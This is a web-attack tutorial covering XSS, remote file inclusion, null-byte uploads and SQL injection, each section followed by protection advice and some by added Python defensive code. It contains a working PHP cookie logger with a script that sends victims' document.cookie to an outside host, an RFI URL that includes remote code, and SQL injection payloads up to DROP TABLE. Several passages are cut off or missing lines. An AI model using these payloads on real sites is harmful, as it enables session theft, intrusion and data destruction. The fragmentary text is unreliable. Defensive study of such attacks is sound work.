Cross Site Scripting (XSS):
Cross Site Scripting (or XSS) is one of the most common application-layer web attacks. It occurs when a web application takes data from one user and sends it back to other users' browsers without filtering or encoding it. Attackers often inject JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable application to fool users and gather data from them. Everything from account hijacking, changing of user settings, cookie theft/poisoning, or false advertising is possible.
Attacks:
XSS Cookie Stealer:
Here I am showing a simple technique to steal the secure cookies from a site, by injecting some code into an insecure site so that user cookies are logged. Cookies are used on a lot of websites to verify authentication. The cookies are unique to each user, so if we take the cookies we are technically able to become that user.
Now, let’s get down to it with some cookie stealer code. First of all I need a third-party host site to put some PHP code on.
<?php
/* Ethernets Cookie Stealer */
/* Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>
<script>
window.location = 'http://yoursite.com/stealer.php?cookie=' + document.cookie;
</script>
cookie to the end. If we now check our file there should be a user cookie inside ‘cookies11.txt’.
Cookie Manipulation:
Here is a very simple example. Sometimes you will see cookies that look like:
Or
Logged_in=true;
Protection:
The simple rule is “Never trust user input and always filter metacharacters”. You can filter them or HTML encode them before they are written into a page. As a user, always try to avoid following external links, that is, any link that points to another host. This can solve 90% of your problems.
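The two protections above (HTML encoding untrusted data, and not trusting a client-side flag such as Logged_in=true) as an added Python example; this is not code from the original page. The HttpOnly flag is the standard mitigation for the document.cookie theft shown in the stealer: a cookie marked HttpOnly is not readable from script. SECRET_KEY, the comment markup and the sample comment are constructed for the example.

```python
"""XSS and cookie-manipulation defences (added example, not the page's code)."""
import hashlib
import hmac
import html

# Constructed sample: the shape of the stealer payload from the page, used only as input
SAMPLE_COMMENT = "<script>window.location='http://attacker.invalid/?c='+document.cookie</script>"


def render_comment_html(untrusted: str) -> str:
    """Encode untrusted text for an HTML text node (the 'HTML encode' option).
    quote=True also encodes ' and " so the same helper is safe inside a quoted attribute."""
    return html.escape(untrusted, quote=True)


def comment_page(untrusted: str) -> str:
    """Build a fragment that places the comment in a text node and in an attribute."""
    safe = render_comment_html(untrusted)
    return f'<p class="comment" data-raw="{safe}">{safe}</p>'


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie header for a session id: HttpOnly keeps document.cookie from
    reading it, Secure keeps it off plaintext HTTP, SameSite=Lax limits cross-site sends."""
    return f"Set-Cookie: session={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


# Signed cookie values instead of 'Logged_in=true' style flags the client can edit.
SECRET_KEY = b"hypothetical-server-side-key"  # assumption: loaded from config in real code


def sign_value(value: str, key: bytes = SECRET_KEY) -> str:
    """Append an HMAC so the server can detect any edit to the value."""
    mac = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_value(cookie: str, key: bytes = SECRET_KEY):
    """Return the original value if the MAC matches, otherwise None."""
    value, sep, mac = cookie.rpartition(".")
    if not sep:
        return None  # no MAC at all, e.g. a bare 'Logged_in=true'
    expected = hmac.new(key, value.encode(), hashlib.sha256).hexdigest()
    if hmac.compare_digest(mac, expected):
        return value
    return None
```

The encoding helper is only correct for HTML text and quoted-attribute contexts; data written into a script block or a URL needs the encoding for that context instead.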
Remote file inclusion (RFI):
Remote file inclusion is a major class of attacks on PHP programs. Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and, if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user.
Attacks:
In the default configuration of a PHP installation, allow_url_fopen = On is set. This capability even works for directives that, seemingly, should be restricted to the local filesystem, such as 'include' and 'require'. Consider the following:
http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode
Here register_globals does not need to be on.
Protection:
Be careful with include() or require().
Instead of include($page . 'otherpage.php'), use a fixed path such as include('otherpage.php').
And be attentive about the register_globals configuration.
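The protection above, as an added Python example (not code from the original page): the request parameter never becomes part of a path; it only selects an entry from an allow-list of known pages. PAGE_ROOT and the PAGES table are hypothetical. Note also that since PHP 5.2 include/require of a URL needs allow_url_include = On, which is Off by default, so that setting is the first thing to check on a real server.

```python
"""Allow-list page dispatch in place of include($page . ...) (added example)."""
import posixpath
import re

PAGE_ROOT = "/var/www/app/pages"  # hypothetical directory outside the web root
PAGES = {"home": "home.php", "about": "about.php", "contact": "contact.php"}  # hypothetical
_NAME_RE = re.compile(r"^[a-z][a-z0-9_]{0,31}$")


def resolve_page(own_me: str):
    """Map the request parameter (the page's own_me example) to a file path.
    Returns the path for allow-listed names and None for anything else, so
    'http://example.com/badcode' and '../etc/passwd' are both refused."""
    if not isinstance(own_me, str) or not _NAME_RE.fullmatch(own_me):
        return None
    filename = PAGES.get(own_me)
    if filename is None:
        return None
    path = posixpath.normpath(posixpath.join(PAGE_ROOT, filename))
    # Defence in depth: even a bad table entry must not escape PAGE_ROOT.
    if posixpath.commonpath([PAGE_ROOT, path]) != PAGE_ROOT:
        return None
    return path


def looks_like_rfi(own_me: str) -> bool:
    """Detection helper for access-log review: flags scheme-prefixed values,
    directory traversal and null bytes in the parameter."""
    return bool(re.search(r"^[a-z][a-z0-9+.-]*://|\.\./|%00|\x00", own_me, re.I))
```

The regular expression in looks_like_rfi is deliberately broad; it is meant for spotting probes in logs, not as the only protection, which is the allow-list.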
Null Byte – picture upload:
A null character/null byte/null terminator is a character with a value of zero, as shown in the ASCII chart. In programming languages (PHP included) the null byte is used as what is known as a ’string terminator’.
Attacks:
Now that we have a target we are able to start exploiting. Go to your target's upload page, click the ‘Browse’ button and navigate to a PHP shell. Just for the sake of a proof of concept, try to upload this file normally. You will get an error such as:
Protection:
Check the file type from the file's content instead of trusting the file extension.
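The protection above as an added Python example (not code from the original page): the upload is identified from its leading bytes, a client filename containing a null byte is rejected outright, and the stored name is generated by the server. The magic numbers are the real PNG, JPEG and GIF signatures; the allowed-type list and the sample inputs are constructed for the example.

```python
"""Content-based upload validation (added example, not the page's code)."""
import secrets

# Real file signatures for the image types this hypothetical app allows.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}


def detect_image_type(data: bytes):
    """Identify the file type from its leading bytes, ignoring the client's name."""
    for magic, ext in MAGIC.items():
        if data[: len(magic)] == magic:
            return ext
    return None


def validate_upload(client_filename: str, data: bytes):
    """Return (ok, stored_name_or_reason).
    The stored name is server-generated and its extension comes from the detected
    type, so the client-supplied name never reaches the filesystem."""
    if "\x00" in client_filename:
        return False, "null byte in filename"
    ext = detect_image_type(data)
    if ext is None:
        return False, "content is not an allowed image type"
    return True, f"{secrets.token_hex(16)}.{ext}"
```

A signature check alone does not stop a valid image that also carries script in a comment chunk, so store uploads outside the document root and serve them with a fixed Content-Type rather than letting the server interpret them.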
SQL Injection:
SQL injection is a technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is in fact an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.
Attacks:
The Target Intranet
This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into a SQL statement. This results in the potential manipulation of the statements performed on the database by the end user of the application.
FROM table
WHERE field = '$EMAIL';
Then the query will be:
FROM table
WHERE field = 'anything' OR 'x'='x';
Schema field mapping:
Now we are trying to retrieve the schema (the field names of a table). This process will involve quite a lot of guessing. Let’s consider the following case.
FROM table
WHERE field = 'x' AND email IS NULL; --';
Finding the table name:
Let’s consider the following case,
FROM table
WHERE email = 'x' AND 1=(SELECT COUNT(*) FROM tabname); --';
FROM members
WHERE email = 'x' AND members.email IS NULL; --';
Finding some users:
FROM members
WHERE email = 'x' OR full_name LIKE '%Bob%';
Brute-force password guessing:
FROM members
WHERE email = 'bob@example.com' AND passwd = 'hello123';
FROM members
WHERE email = 'x'; DROP TABLE members; --'; -- Boom!
Protection:
When a user gives any data as input, filter single quotes and double quotes, or add a backslash before each single quote or double quote. Different databases return different server error messages and error numbers. Avoid showing these errors to the user; show a readable message instead.
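An added Python example (not code from the original page) that puts the page's vulnerable query pattern beside the parameterized form, using an in-memory SQLite members table with constructed rows and the page's own column names. Parameterized queries go further than the quote filtering described above: the value is passed to the driver separately from the SQL text, so quotes in it never have syntactic meaning. The last function shows the "readable message instead of the raw error" rule.

```python
"""String-built vs parameterized query (added example, not the page's code)."""
import sqlite3


def make_db():
    """In-memory table with constructed rows, matching the page's column names."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members (email TEXT, passwd TEXT, full_name TEXT)")
    conn.executemany(
        "INSERT INTO members VALUES (?, ?, ?)",
        [
            ("bob@example.com", "hello123", "Bob Smith"),    # constructed
            ("alice@example.com", "s3cret", "Alice Jones"),  # constructed
        ],
    )
    return conn


def lookup_vulnerable(conn, email: str):
    """The page's pattern: the value is spliced into the statement text."""
    sql = f"SELECT email FROM members WHERE email = '{email}'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(conn, email: str):
    """Parameterized: the driver receives the value separately, never as SQL text."""
    return [
        row[0]
        for row in conn.execute("SELECT email FROM members WHERE email = ?", (email,))
    ]


def lookup_for_user(conn, email: str):
    """Log the real database error server-side; return a readable message to the user."""
    try:
        return {"ok": True, "rows": lookup_safe(conn, email)}
    except sqlite3.Error:
        # In real code: log the exception with a request id; never echo it to the client.
        return {"ok": False, "message": "Request could not be processed."}
```

With the page's input anything' OR 'x'='x the vulnerable function returns every row, while the parameterized one looks for a literal address containing those characters and returns nothing.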